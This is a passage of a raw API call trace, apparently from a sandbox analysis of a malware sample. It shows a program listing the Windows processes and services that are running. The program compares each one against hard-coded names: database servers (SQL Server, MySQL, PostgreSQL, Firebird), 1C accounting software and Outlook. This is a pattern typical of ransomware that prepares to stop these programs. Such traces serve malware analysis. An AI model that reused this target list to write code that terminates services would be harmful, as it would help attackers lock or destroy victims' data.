lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0268.643] lstrlenW (lpString="taskhost.exe") returned 12 [0268.643] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.643] lstrlenW (lpString="svchost.exe") returned 11 [0268.643] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0268.643] CloseHandle (hObject=0x318) returned 1 [0268.644] Sleep (dwMilliseconds=0x1f4) [0269.198] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x42dc588 [0269.449] EnumServicesStatusExW (in: hSCManager=0x42dc588, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0269.451] GetLastError () returned 0xea [0269.451] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xba0) returned 0x4262fb8 [0269.451] EnumServicesStatusExW (in: hSCManager=0x42dc588, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4262fb8, cbBufSize=0xba0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4262fb8, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0269.452] CloseServiceHandle (hSCObject=0x42dc588) returned 1 [0269.452] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0269.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0269.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0269.452] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0269.452] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0269.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0269.452] lstrlenW (lpString="AudioSrv") returned 8 [0269.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0269.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0269.452] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0269.452] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0269.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0269.452] lstrlenW (lpString="BFE") returned 3 [0269.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0269.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0269.453] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0269.453] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0269.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0269.453] lstrlenW (lpString="CryptSvc") returned 8 [0269.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0269.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0269.453] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0269.453] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0269.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0269.453] lstrlenW (lpString="CscService") returned 10 [0269.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0269.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0269.453] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0269.453] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0269.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0269.453] lstrlenW (lpString="DcomLaunch") returned 10 [0269.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0269.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0269.453] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0269.453] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0269.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0269.453] lstrlenW (lpString="Dhcp") returned 4 [0269.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0269.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0269.453] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0269.453] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0269.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0269.454] lstrlenW (lpString="Dnscache") returned 8 [0269.454] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0269.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0269.454] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0269.454] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0269.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0269.454] lstrlenW (lpString="DPS") returned 3 [0269.454] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0269.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0269.454] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0269.454] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0269.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0269.454] lstrlenW (lpString="eventlog") returned 8 [0269.454] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0269.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0269.454] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0269.454] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0269.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0269.454] lstrlenW (lpString="EventSystem") returned 11 [0269.454] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0269.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0269.454] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0269.454] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0269.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0269.454] lstrlenW (lpString="gpsvc") returned 5 [0269.454] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0269.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0269.454] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0269.454] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0269.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0269.454] lstrlenW (lpString="LanmanWorkstation") returned 17 [0269.454] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0269.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0269.455] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0269.455] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0269.455] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0269.455] lstrlenW (lpString="lmhosts") returned 7 [0269.455] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0269.455] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0269.455] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0269.455] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0269.455] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0269.455] lstrlenW (lpString="MMCSS") returned 5 [0269.455] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0269.455] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0269.455] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0269.455] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0269.455] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0269.455] lstrlenW (lpString="MpsSvc") returned 6 [0269.455] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0269.455] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0269.455] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0269.455] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0269.455] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0269.455] lstrlenW (lpString="nsi") returned 3 [0269.455] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0269.455] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0269.455] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0269.455] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0269.455] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0269.455] lstrlenW (lpString="PlugPlay") returned 8 [0269.455] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0269.455] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0269.455] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0269.455] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0269.456] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0269.456] lstrlenW (lpString="Power") returned 5 [0269.456] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0269.456] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0269.456] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0269.456] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0269.456] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0269.456] lstrlenW (lpString="ProfSvc") returned 7 [0269.456] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0269.456] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0269.456] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0269.456] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0269.456] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0269.456] lstrlenW (lpString="RpcEptMapper") returned 12 [0269.456] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0269.456] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0269.456] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0269.456] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0269.456] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0269.456] lstrlenW (lpString="RpcSs") returned 5 [0269.456] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0269.456] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0269.456] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0269.456] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0269.456] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0269.456] lstrlenW (lpString="SamSs") returned 5 [0269.456] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0269.456] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0269.456] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0269.456] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0269.456] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0269.457] lstrlenW (lpString="Schedule") returned 8 [0269.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0269.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0269.457] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0269.457] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0269.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0269.457] lstrlenW (lpString="SENS") returned 4 [0269.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0269.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0269.457] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0269.457] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0269.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0269.457] lstrlenW (lpString="ShellHWDetection") returned 16 [0269.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0269.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0269.457] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0269.457] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0269.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0269.457] lstrlenW (lpString="Spooler") returned 7 [0269.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0269.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0269.457] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0269.457] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0269.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0269.457] lstrlenW (lpString="Themes") returned 6 [0269.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0269.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0269.457] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0269.457] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0269.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0269.457] lstrlenW (lpString="UxSms") returned 5 [0269.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0269.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0269.458] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0269.458] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0269.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0269.458] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4262fb8 | out: hHeap=0x4a0000) returned 1 [0269.458] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x380 [0269.459] Process32FirstW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.460] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0269.460] lstrlenW (lpString="System") returned 6 [0269.460] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0269.460] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0269.460] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0269.460] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0269.460] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0269.460] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0269.460] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0269.460] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0269.461] lstrlenW (lpString="smss.exe") returned 8 [0269.461] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0269.461] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0269.461] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0269.461] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0269.461] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0269.461] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0269.461] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0269.461] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0269.461] lstrlenW (lpString="csrss.exe") returned 9 [0269.461] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0269.461] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0269.461] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0269.461] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0269.461] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0269.461] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0269.461] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0269.462] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0269.462] lstrlenW (lpString="wininit.exe") returned 11 [0269.462] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0269.462] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0269.462] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0269.462] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0269.462] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0269.462] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0269.462] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0269.462] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0269.463] lstrlenW (lpString="csrss.exe") returned 9 [0269.463] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0269.463] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0269.463] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0269.463] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0269.463] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0269.463] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0269.463] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0269.463] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0269.463] lstrlenW (lpString="winlogon.exe") returned 12 [0269.463] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0269.463] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0269.463] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0269.463] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0269.463] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0269.464] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0269.464] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0269.464] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0269.464] lstrlenW (lpString="services.exe") returned 12 [0269.464] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0269.464] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0269.464] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0269.464] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0269.464] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0269.464] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0269.464] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0269.464] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0269.464] lstrlenW (lpString="lsass.exe") returned 9 [0269.464] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0269.464] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0269.464] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0269.464] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0269.465] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0269.465] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0269.465] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0269.465] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0269.465] lstrlenW (lpString="lsm.exe") returned 7 [0269.465] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0269.465] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0269.465] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0269.465] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0269.465] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0269.465] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0269.465] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0269.465] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.465] lstrlenW (lpString="svchost.exe") returned 11 [0269.465] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0269.465] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0269.465] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0269.466] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0269.466] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0269.466] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0269.466] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0269.466] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.466] lstrlenW (lpString="svchost.exe") returned 11 [0269.466] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0269.466] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0269.466] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0269.466] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0269.466] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0269.466] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0269.466] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0269.466] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, 